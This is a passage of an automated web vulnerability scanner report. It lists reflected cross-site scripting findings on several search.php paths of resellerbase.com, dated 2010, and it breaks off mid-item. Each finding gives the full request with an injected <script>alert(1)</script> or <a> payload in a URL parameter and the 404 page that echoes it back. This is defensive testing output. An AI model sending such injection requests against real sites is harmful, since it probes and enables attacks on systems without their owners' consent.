<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php99543<script>alert(1)</script>b43d08c3919?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.967. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6cd0c<a>ac6faa64184 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search6cd0c<a>ac6faa64184&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search6cd0c<a>ac6faa64184&opt=2 was not found on this server.</p>
...[SNIP]...

2.968. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f40d6<a>489b2a1ac78 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...f40d6<a>489b2a1ac78&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...f40d6<a>489b2a1ac78&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.969. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1473a<script>alert(1)</script>acc172def0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1473a<script>alert(1)</script>acc172def0c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1473a<script>alert(1)</script>acc172def0c=1 was not found on this server.</p>
...[SNIP]...

2.970. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b3d4b<a>ccfcceb150e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b3d4b<a>ccfcceb150e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b3d4b<a>ccfcceb150e was not found on this server.</p>
...[SNIP]...

2.971. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9dffd<script>alert(1)</script>df047ab7161 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9dffd<script>alert(1)</script>df047ab7161/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9dffd<script>alert(1)</script>df047ab7161/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.972. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc5fa<script>alert(1)</script>85b590407ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11dc5fa<script>alert(1)</script>85b590407ec/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11dc5fa<script>alert(1)</script>85b590407ec/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.973. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c318b<script>alert(1)</script>01d91dcff7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themesc318b<script>alert(1)</script>01d91dcff7e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themesc318b<script>alert(1)</script>01d91dcff7e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.974. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1dc29<script>alert(1)</script>839dc6516b6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos1dc29<script>alert(1)</script>839dc6516b6/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos1dc29<script>alert(1)</script>839dc6516b6/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.975. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 171ee<script>alert(1)</script>fe19e789393 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images171ee<script>alert(1)</script>fe19e789393/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images171ee<script>alert(1)</script>fe19e789393/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.976. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cab90<script>alert(1)</script>ea43b0e35b0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/search.phpcab90<script>alert(1)</script>ea43b0e35b0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.phpcab90<script>alert(1)</script>ea43b0e35b0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.977. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bb96b<a>3ae408f9245 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbb96b<a>3ae408f9245&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbb96b<a>3ae408f9245&opt=2 was not found on this server.</p>
...[SNIP]...

2.978. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7cfab<a>3197fc5a51c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...7cfab<a>3197fc5a51c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...7cfab<a>3197fc5a51c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.979. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d27b9<script>alert(1)</script>022ea273b9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d27b9<script>alert(1)</script>022ea273b9f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&d27b9<script>alert(1)</script>022ea273b9f=1 was not found on this server.</p>
...[SNIP]...

2.980. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f895d<a>9ea485156fb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2f895d<a>9ea485156fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2f895d<a>9ea485156fb was not found on this server.</p>
...[SNIP]...

2.981. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 59ffd<script>alert(1)</script>ffb69a2c1fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail59ffd<script>alert(1)</script>ffb69a2c1fe/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail59ffd<script>alert(1)</script>ffb69a2c1fe/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.982. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8041e<script>alert(1)</script>bc30af7bbdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/118041e<script>alert(1)</script>bc30af7bbdc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/118041e<script>alert(1)</script>bc30af7bbdc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.983. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 43c75<script>alert(1)</script>1ff157ea5e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes43c75<script>alert(1)</script>1ff157ea5e3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes43c75<script>alert(1)</script>1ff157ea5e3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.984. http://www.resellerbase.com/detail/11/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e97<script>alert(1)</script>8d4bb99e7c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos70e97<script>alert(1)</script>8d4bb99e7c6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

